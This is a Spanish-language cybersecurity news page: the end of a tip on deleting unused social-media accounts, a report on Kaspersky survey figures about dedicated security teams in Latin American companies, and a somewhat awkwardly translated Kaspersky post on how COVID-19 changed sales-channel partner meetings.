Esto es algo que muchos usuarios no tienen en cuenta. Pongamos que hemos creado una cuenta en una red social que dejamos de usar. Nuestros datos siguen ahí. Puede que haya información personal que puedan utilizar para suplantar la identidad. Incluso podría haber una filtración de datos en esa plataforma. Nuestro consejo es eliminar los perfiles que no usemos. En definitiva, estas son algunas cuestiones que podemos tener en cuenta para evitar la suplantación en redes sociales. Algunos consejos básicos que vienen muy bien.

Seguridad y TI, ¿uno mismo?

Solo el 21% de las empresas latinoamericanas cuentan con equipos de inteligencia de amenazas

.
 .  (Foto: iStock)

Combinar las funciones de TI y seguridad en un solo departamento puede ser conveniente para las empresas, especialmente para acelerar los procesos internos. Sin embargo, todas las compañías, especialmente las más grandes, necesitan contar con profesionales calificados para protegerse de los ciberataques, que están en constante evolución por lo que la combinación de funciones puede traer riesgos, aseguró Kaspersky. 

En una investigación que revela el perfil del departamento de seguridad de las empresas ubicadas en diferentes regiones del mundo, la firma encontró que a nivel mundial, el 52% de las empresas tiene equipos de TI con funciones independientes.

En lo que respecta a América Latina, la región está bien posicionada en el ranking: más de la mitad de las empresas (51%) expresó que la ciberseguridad es administrada por departamentos o profesionales dedicados, por detrás de Japón (65%) y la región de Oriente Medio y África (58%).

Sin embargo, cuando se trata de estructuras de ciberseguridad más avanzadas, con la existencia de un Centro Operativo de Seguridad (SOC) interno responsable del monitoreo continuo y la respuesta a incidentes de seguridad, América Latina cae a la quinta posición, con solo el 14% de las empresas con este tipo de estructura. En cuanto a equipos especializados, solo el 21% de las empresas latinoamericanas cuentan con equipos de inteligencia de amenazas y el 15% con analistas de malware.

Si bien parece que la inversión de las empresas en departamentos y profesionales especializados es baja, la mayoría está dispuesta a incrementar la calificación de sus equipos: el 78% de las empresas latinoamericanas espera que sus inversiones en TI crezcan en los próximos tres años y, entre las razones mencionadas, para 38% la prioridad es mejorar el nivel de especialización de sus empleados.

Por lo anterior, Kaspersky insistió en que para poder lidiar con las configuraciones organizacionales más diversas, así como con las estructuras internas, las compañías necesitan soluciones especializadas. 
RECOMENDACIONES

Kaspersky echa un vistazo a cómo la pandemia Covid-19 ha afectado a la ciberseguridad para el espacio SMB

‎Kaspersky echa un vistazo a cómo la pandemia Covid-19 ha afectado a la ciberseguridad para el espacio SMB.‎

‎No hay duda de que la pandemia Covid-19 ha puesto patas arriba la idea del trabajo. Después de un año de trabajar en sudores, desde cocinas, dormitorios de repuesto, baños, patios o la playa; las empresas han aprendido que los empleados no tienen que estar en una oficina para tener éxito.‎

‎Sin embargo, dicho esto, un año virtual también ha visto ‎‎personas extrañan la interacción cara a cara‎‎con sus compañeros.‎

‎”Lo siento las videoconferencias, no eres tú, somos nosotros”

‎Si bien esa cita es puramente un producto de nuestra imaginación, sabemos que mucha gente definitivamente se siente así. Seamos sinceros: un año de trabajo remoto, haciendo malabares con los niños y la escuela con el trabajo y simplemente no ver a la gente puede tener un verdadero impacto en la psique.‎

‎Cuando piensas en posiciones que se verían afectadas, las ventas saltan inmediatamente a la cima de la mente. Estas personas siempre se reúnen cara a cara, ya sea para establecer una red o finalizar un acuerdo. Con esto en mente, el equipo de Kaspersky decidió hablar con el canal y ver cómo estos negocios se vieron afectados durante la pandemia.‎

‎¿Por qué harías esto? Bueno, la razón es simple. Kaspersky es una empresa impulsada por 100% canales y aunque siempre queremos tener éxito, también queremos ‎‎Socios‎‎ para tener éxito y prosperar.‎

‎”Lo que realmente me destacó fue que el 76% de los respondedores quieren volver a los modelos de ventas prepandémicos”, señaló Matt Courchesne, jefe de canal de Kaspersky North America, al ver los resultados de la encuesta.‎

‎Para aquellos que se preguntan estas son las reuniones donde los socios se reúnen físicamente con los clientes, rompiendo el pan, compartiendo las mejores prácticas o incluso trabajando estrechamente juntos para abordar desafíos específicos. Dado que la ciberseguridad no es realmente algo, como decir una máquina de fax, que simplemente se puede establecer y olvidar – estas reuniones son clave para tener tanto el cliente y el proveedor en la misma página y trabajar en tándem para la protección del cliente y sus clientes.‎

‎A pesar del hecho de que estas reuniones en persona son importantes, la encuesta también mostró que a pesar del deseo de volver a la normalidad, que el canal también es bastante realista.‎

‎”La pandemia realmente desafió la forma en que hacemos negocios y buscamos incorporar la tecnología en las relaciones cotidianas con los clientes”, agregó Courchesne. “El 73% de los encuestados señaló que continuaría realizando videollamadas. Es importante estar cara a cara, pero también tenemos que ser estratégicos, ya que las reuniones de vídeo se han vuelto valiosas y también deben continuar”.‎

‎Mirando un poco más en la encuesta, algunos matices claros fueron que la relación entre proveedores como Kaspersky y los socios del Canal está aumentando en importancia. Ambas partes seguirán buscando adaptar y evolucionar la forma en que trabajan para apoyar a los clientes de SMB en toda América del Norte.‎

‎Para obtener más información sobre el impacto de COVID en el canal y el futuro de las relaciones entre revendedores y proveedores, lea el informe ‎‎aquí‎

‎El último año ha sido duro para todos nosotros y todos esperamos que el flagelo que es Covid-19 se traslada a nosotros más pronto que tarde. El término “volver a la normalidad”, se ha barajado bastante, pero lo normal aún no se ha definido claramente. No importa, todos esperamos con ansias lo que sea.‎